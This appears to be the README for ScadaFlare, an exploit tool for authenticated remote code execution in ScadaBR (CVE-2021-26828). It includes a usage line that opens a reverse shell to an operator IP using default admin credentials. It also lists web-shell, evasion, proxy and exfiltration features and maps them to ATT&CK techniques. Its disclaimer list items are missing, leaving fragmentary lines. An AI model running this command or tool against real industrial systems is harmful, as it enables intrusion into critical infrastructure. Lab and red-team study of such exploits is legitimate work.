
ScadaFlare Authenticated RCE Exploit Framework for ScadaBR (CVE-2021-26828) OpenPLC ScadaBR
A modular post-auth RCE exploit targeting ScadaBR <1.1.0, enhanced for red team ops.

.jsp shell via view_edit.shtmThis exploit was developed during analysis of the HTB Pro Lab: Alchemy scenario. The original PoC by Fellipe Oliveira was solid but:
Written in Python 2
Lacked modern features like proxy support, shell cleanup, enumeration chaining
Was difficult to extend or integrate into red team workflows
This version, ScadaFlare, is a full rewrite in Python 3 with modular support, multiple evasion strategies, OS detection override, webhook integration, SOCKS proxy support, and enumeration chains for real world operator use.
python3 scadaflare.py http://172.16.0.20:80 admin admin \
--reverse-ip 10.10.14.44 --reverse-port 4445 \
--verbose --cleanup
ScadaFlare is designed solely for:
Unauthorized use against real industrial systems can:
By using this tool you accept full responsibility for:
MIT License – see LICENSE
| Phase | Technique | ID |
|---|
| Initial Access (post-auth) | Valid Accounts | T1078 |
| Execution | Exploit Public-Facing Application | T1190 |
| Command Execution | Web Shell | T1505.003 |
| Privilege Actions | Modify Web Content | T1505 |
| Credential Access | Credential in Configuration Files | T1552.001 |
| Discovery | Remote System Discovery | T1018 |
| Exfiltration | Exfiltration Over Web Service | T1567.002 |
| Defense Evasion | Proxy & Protocol Tunneling | T1090 |